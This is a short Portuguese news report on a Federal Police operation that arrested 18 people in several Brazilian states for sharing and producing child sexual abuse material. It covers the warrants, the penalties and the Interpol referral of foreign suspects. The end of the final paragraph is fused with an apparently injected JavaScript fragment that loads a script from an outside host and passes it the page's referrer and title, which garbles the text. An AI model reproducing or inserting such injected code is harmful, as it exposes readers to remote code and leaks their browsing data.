Operação prende 18 contra pornografia infantil na internet

A Polícia Federal deflagrou nesta quinta-feira (27) a operação Underground para combater a pornografia infantil na internet. No total, 18 pessoas foram presas em São Paulo, Minas Gerais, Bahia, Ceará, Mato Grosso do Sul, Goiás, Rio Grande do Sul e Distrito Federal.

Foram cumpridos 21 mandados de busca e apreensão e cinco de prisão preventiva, todos expedidos pela 8ª Vara Criminal Federal de São Paulo. Outras 13 pessoas foram presas em flagrante pela posse de material pornográfico.

As investigações apontam que além de praticarem o compartilhamento de materiais pornográficos infantis em grupos de aplicativos de celular, os investigados também produziam o material. A quantidade de arquivos contendo fotos e vídeos de abuso sexual de crianças é expressiva.

A PF desenvolveu técnicas de investigação cibernética para o combater esse tipo de crime, dentro e fora do ambiente da deep web, tendo identificado os alvos da Operação #Underground a partir de suas comunicações.

Além dos brasileiros presos hoje, foram identificados também alguns estrangeiros,  cujos dados serão encaminhados, por meio da Interpol, para os países onde se encontram.

O crime de publicação de imagens de pornografia infantil prevê pena de 3 a 6 anos de reclusão. Já o efetivo estupro de vulneráveis, tem como pena a reclusão de 8 a 15 anos.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário